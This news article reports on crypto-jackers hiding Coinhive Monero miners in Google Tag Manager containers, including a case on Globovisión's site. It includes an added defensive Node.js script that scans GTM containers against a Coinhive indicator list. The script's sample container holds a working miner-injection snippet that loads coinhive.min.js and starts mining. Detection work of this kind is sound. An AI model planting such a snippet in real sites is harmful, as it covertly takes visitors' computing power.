Crypto-jackers enlist Google Tag Manager to smuggle alt-coin miners

Ad giant has malware detection in its script-hosting service... but Coinhive isn't flagged

Crypto-jackers using Coinhive code to secretly mine Monero with computing power supplied by unsuspecting visitors have found Google Tag Manager to be a convenient means of distribution.

Security researcher Troy Mursch told The Register that he recently found Coinhive's free-to-use JavaScript running on the Globovisión website – Globovisión being a 24-hour telly station for Venezuela and Latin America.

The code was invisibly spawned, he said, "from the embedded Google Tag Manager script gtm.js?id=GTM-KCDXG2D," which in turn loaded cryptonight.wasm, the WebAssembly build of Coinhive's CryptoNight mining code.

Google Tag Manager lets marketers, or anyone else with a website, define snippets of code, dubbed tags, that are injected into webpages dynamically at load time: the site embeds a single Google-served container script, and the tags live in that container rather than being hardcoded into the site's own files.

Google's service, handily enough, provides more control and flexibility than static code delivery.

Because the tags are served by Google Tag Manager, the code is not present in the source files on the site's own web server. The script reference and its container ID, gtm.js?id=GTM-KCDXG2D, reveal nothing about what the tags inside will do. Essentially, miscreants are hacking websites and quietly adding Google-hosted tags that contain the malicious coin-mining code, thus obscuring the source of the scripts.
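Since the page source shows only the container ID, a site owner who wants to know what a container actually delivers has to pull the served gtm.js and inspect it. The following is an added example, not code from the article, from Google or from Coinhive: it extracts GTM container IDs from page HTML, fetches each container from googletagmanager.com, and scans the returned script for strings that Coinhive's loader and its cryptonight.wasm build leave behind. The indicator list and the sample page and container body are constructed assumptions for the example; the container JSON shape is only approximately what Google serves.

```javascript
// Added example (not the article's, Google's or Coinhive's code): audit a page
// for Google Tag Manager containers and scan the container script Google
// serves for traces of the Coinhive miner. Node.js 18+ (global fetch).
// All sample data below is constructed for the example.

// A container is referenced either by a direct script tag
// (.../gtm.js?id=GTM-XXXX) or, more commonly, by the official snippet, which
// passes the ID as a string argument and builds the URL at runtime.
// Matching the ID token itself covers both forms.
const GTM_ID_RE = /\bGTM-[A-Z0-9]{4,}\b/g;

// Indicators of the Coinhive miner. The list is an assumption built from the
// names the article mentions; it is a baseline, not an exhaustive signature.
const MINER_INDICATORS = [
  'coinhive.com',
  'coinhive.min.js',
  'cryptonight.wasm',
  'CoinHive.Anonymous',
  'CoinHive.User',
];

function findContainerIds(html) {
  return [...new Set(html.match(GTM_ID_RE) || [])];
}

function containerUrl(id) {
  return `https://www.googletagmanager.com/gtm.js?id=${encodeURIComponent(id)}`;
}

// Scan the text of a served container for each indicator; return the hits
// with a little surrounding context so the auditor can see which tag carries it.
function scanContainer(body) {
  const hits = [];
  for (const indicator of MINER_INDICATORS) {
    const idx = body.indexOf(indicator);
    if (idx === -1) continue;
    const start = Math.max(0, idx - 40);
    const end = Math.min(body.length, idx + indicator.length + 40);
    hits.push({ indicator, context: body.slice(start, end) });
  }
  return hits;
}

// Offline core: given the page HTML and the container bodies keyed by ID,
// produce one report entry per container the page references.
function auditContainers(html, bodiesById) {
  return findContainerIds(html).map((id) => ({
    id,
    url: containerUrl(id),
    hits: scanContainer(bodiesById[id] || ''),
  }));
}

// Network wrapper: fetch every container the page references, then scan.
async function auditPage(html, fetchText = (url) => fetch(url).then((r) => r.text())) {
  const bodies = {};
  for (const id of findContainerIds(html)) {
    bodies[id] = await fetchText(containerUrl(id));
  }
  return auditContainers(html, bodies);
}

// Constructed sample: a page carrying the standard GTM snippet, and a
// container body whose custom HTML tag pulls in the Coinhive loader.
const SAMPLE_HTML = `<html><head>
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-ABC1234');</script>
</head><body>Hello</body></html>`;

const SAMPLE_CONTAINER = 'var data={"resource":{"tags":[{"function":"__html","vtp_html":'
  + '"<script src=\\"https://coinhive.com/lib/coinhive.min.js\\"></script>'
  + '<script>new CoinHive.Anonymous(\'SITEKEY\').start();</script>"}]}};';

console.log(JSON.stringify(auditContainers(SAMPLE_HTML, { 'GTM-ABC1234': SAMPLE_CONTAINER }), null, 2));
```

Two caveats for anyone running this against a live site: a container can be edited by whoever holds the GTM account and changes take effect immediately, so a clean scan is only good for the moment it ran; and a custom HTML tag may load the miner through a second-stage URL that contains none of these strings, so pair the container audit with network-level checks such as requests for cryptonight.wasm or DNS lookups of coinhive.com.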

Mursch said the Globovisión mining code was removed within an hour of discovery, and it's not clear how it got there. He found the Monero-crafting JS, he said, while reviewing another crypto-jacking incident involving a Brazilian singer's website.

Google did not immediately respond to a request for comment.

A month ago, when The Register reported that Google short URLs were being co-opted for Monero, there were about 113,000 instances of cryptonight mining. Presently, there are about 180,000.

The Chocolate Factory's Tag Manager Terms of Service prohibits misuse, and the ad distribution biz has systems in place to look for malware in tags and prevent them from firing when found.

"In most cases, affected users are unaware that there are tags serving malware from their containers," the web giant explained on its website. "Usually through no fault of your own, a network provider becomes malware infected when they install 3rd party libraries or templates onto their websites, and subsequently transmit that malware to your site via the custom HTML tag that you published onto your website via Tag Manager."

That being the case, it appears that Google either cannot detect Coinhive code delivered through Tag Manager or doesn't consider it malicious. Most ad blockers, as well as antivirus tools, kill Coinhive's code on sight these days.

Coinhive's development team did not respond to a request for comment.

Noting that crypto-jacking tops Malwarebytes' list of security ills likely to be visited upon businesses and consumers in 2018, Mursch said: "We should expect this trend to continue." ®
